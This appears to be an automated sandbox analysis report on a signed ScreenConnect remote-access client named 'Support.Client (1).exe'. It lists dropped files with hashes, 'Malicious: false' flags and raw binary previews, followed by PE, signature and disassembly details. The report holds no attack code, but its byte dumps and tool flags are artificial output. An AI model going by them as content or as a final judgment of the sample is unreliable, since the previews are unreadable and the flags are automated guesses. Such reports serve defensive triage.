Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1215
Entropy (8bit):	5.1306699113418395
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0AQavSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AQ2GVETDTo
MD5:	293C100B1896E7532D241DAC2B32DCB3
SHA1:	1E14B49C9AF799DA0371474BF712F3AC3E5B6EBC
SHA-256:	AC3C489C02264FF1918FC0B79083A7754B98542A6CC4E2AF67EAFDBF76C6232E
SHA-512:	ED3935D90F48043BE2BF7A60CACBB47964672EAB0C9EBFC2EEAC8EBC4341383F32F55901601DE56698EEF6AEC6399E77EB8DEC6F5158D1B3761D5F25ADFC3499
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639085961200334
Encrypted:	false
SSDEEP:	24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
MD5:	9AD3964BA3AD24C42C567E47F88C82B2
SHA1:	6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
SHA-256:	84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
SHA-512:	CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..\|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...\|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1980
Entropy (8bit):	5.057602063510745
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AQYvSkcyMQgcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AQ0HMQgGQAXRTFgTo
MD5:	88ECD545BDBE3ED49C6A2B87589102EC
SHA1:	E72949AF66B0A20E50474D2005E320BA63BA9B2B
SHA-256:	D48AFB709E61B86EB6EEF67B41D0FA7EC780C4536F5CF9ACA7A0B440AED98EF0
SHA-512:	7ED19ED32E02348ABC8A64CA0A21E05496A6595A8B94D3F960CF3F6A6C6445D30AAD7AEC09CE76776023F9E5F4B40DF032408DEFFBA102026247099879CB95DE
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61208
Entropy (8bit):	6.310126082367387
Encrypted:	false
SSDEEP:	1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
MD5:	AFA97CAF20F3608799E670E9D6253247
SHA1:	7E410FDE0CA1350AA68EF478E48274888688F8EE
SHA-256:	E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
SHA-512:	FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	602392
Entropy (8bit):	6.176232491934078
Encrypted:	false
SSDEEP:	6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
MD5:	1778204A8C3BC2B8E5E4194EDBAF7135
SHA1:	0203B65E92D2D1200DD695FE4C334955BEFBDDD3
SHA-256:	600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
SHA-512:	A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2569
Entropy (8bit):	5.027116382154264
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AQLHMQgAXQ3MQgTMQgRGTDBTo:1YiW4AQ4QRvQ9QY
MD5:	6A1C3FF3E8F5E23698453B4CCDA2FD12
SHA1:	C7EED4383B7F1982222E663A0B8850D09B6B20EF
SHA-256:	8AA9DACC29FAEF7BE40D54B45FBA75AFC13BF25638D9A46DC4B516529AE74619
SHA-512:	C9F09C968D71F4D7481C1AADBF8337FBCE052F71AA168795DAF374D53CC827BA9E7F1CF9ADC50FC423CF68EE500BFC931DD2E14648626ED7D688F1A41447DCCC
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
Category:	dropped
Size (bytes):	17858
Entropy (8bit):	5.96124399589564
Encrypted:	false
SSDEEP:	384:rexTuzvdu98aXVEf6/DX9mX9FX9R/QPIYM7Y7:rn6/DX9mX9FX9R/QPIN07
MD5:	7F68A01C2FEA1C80A75E287BB36D6B43
SHA1:	F271EBC2542397E59C3D57D30CC54BF1D9DB4F69
SHA-256:	2E0E46F395D5A6440F179B61C4008ABF3D72CFCDA705A543C8EE18B41D37B025
SHA-512:	C6C1C9D6D9C50F94C9BC8C8A422CD00397EE184B6F6113EA19F9209C0E2339B540EE92D35BCCE81F242D6FDC3C720EC2E56675E702E90C91533A07FA9F9DB753
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.3.7.9067" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81688
Entropy (8bit):	5.8618809599146005
Encrypted:	false
SSDEEP:	1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
MD5:	1AEE526DC110E24D1399AFFCCD452AB3
SHA1:	04DB0E8772933BC57364615D0D104DC2550BD064
SHA-256:	EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
SHA-512:	482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	87
Entropy (8bit):	3.463057265798253
Encrypted:	false
SSDEEP:	3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
MD5:	D2DED43CE07BFCE4D1C101DFCAA178C8
SHA1:	CE928A1293EA2ACA1AC01B61A344857786AFE509
SHA-256:	8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
SHA-512:	A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
Malicious:	false
Preview:	......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	5.363907225770245
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
MD5:	E88F0E3AD82AC5F6557398EBC137B0DE
SHA1:	20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
SHA-256:	278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
SHA-512:	CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

C:\Windows\System32\user.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.0293069247766855
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO/SxvSGSbCD0/vXbAa3xT:2dL9hK6E46YP8gGSa6vH
MD5:	8975A2DB9D3613CA73F282C2EA33956C
SHA1:	BEAE1D71A6460461543EF10CDCC92669D752B5B6
SHA-256:	A5048210BA8443ACF1C25CCDEABE57C16E383E5FEF12480B2135A41C846F6653
SHA-512:	063014593A0958B0732A256CCBC91E6CAE17CA6E8DA706BCB4E19DF1517D4C7092ABF755249E2C82A56019AB0519FFB1ED8A71E90BE8D2943CB8867F37B87376
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>api.wisescreen.net=185.49.126.73-13%2f11%2f2024%2017%3a18%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465482720437157
Encrypted:	false
SSDEEP:	6144:kIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNVdwBCswSbT:ZXD94+WlLZMM6YFHX+T
MD5:	AE6DC10FD1CDB4ECB0D1363850140B82
SHA1:	BE1A9956D5423778A012BEB760A932906AEFBF31
SHA-256:	A89E454C8527AB2EA97D666699D89423ECC3541D9F295B35B2335699037AF7D0
SHA-512:	0D63CDE688FE0CD4EF3057B658DB56E019F33D20099D97F314B5D758010CBE9BA0F53998284DC809AB75A83A0083F4CDB37946BA730EEAE021518D654464831E
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..f..5...............................................................................................................................................................................................................................................................................................................................................\q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.513141041752648
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Support.Client (1).exe
File size:	83'328 bytes
MD5:	ee2fd372b98d7899c7e12d85f4c7f695
SHA1:	22f704d299c0160038965ad41d6a486e5c125f55
SHA256:	021ecc419445fe19ca6a15e7367c88f8a4121023746acd94263fb3e156861e03
SHA512:	fb990e00d1ca0cb624c1cacb633218a21b8621096404b6a1f1259700ab7cc236a369a63289aa09410d083821bde81dffe49f9b297043d9667a4d51d5102694d0
SSDEEP:	1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaWPBJYY37tJ:7enkyfPAwiMq0RqRfbaWZJYY3P
TLSH:	A3836C43B5D18475E9720E3118B1D9B4593FBE210E648EAF7398422E0F351D19E3AE7B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............\|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x401489
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x671FCCB3 [Mon Oct 28 17:41:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	37d5c89163970dd3cc69230538a1b72b

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 01:00:00 16/08/2025 00:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007F980CD9C16Ah
jmp 00007F980CD9BC1Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040B048h]
push dword ptr [ebp+08h]
call dword ptr [0040B044h]
push C0000409h
call dword ptr [0040B04Ch]
push eax
call dword ptr [0040B050h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040B054h]
test eax, eax
je 00007F980CD9BDA7h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
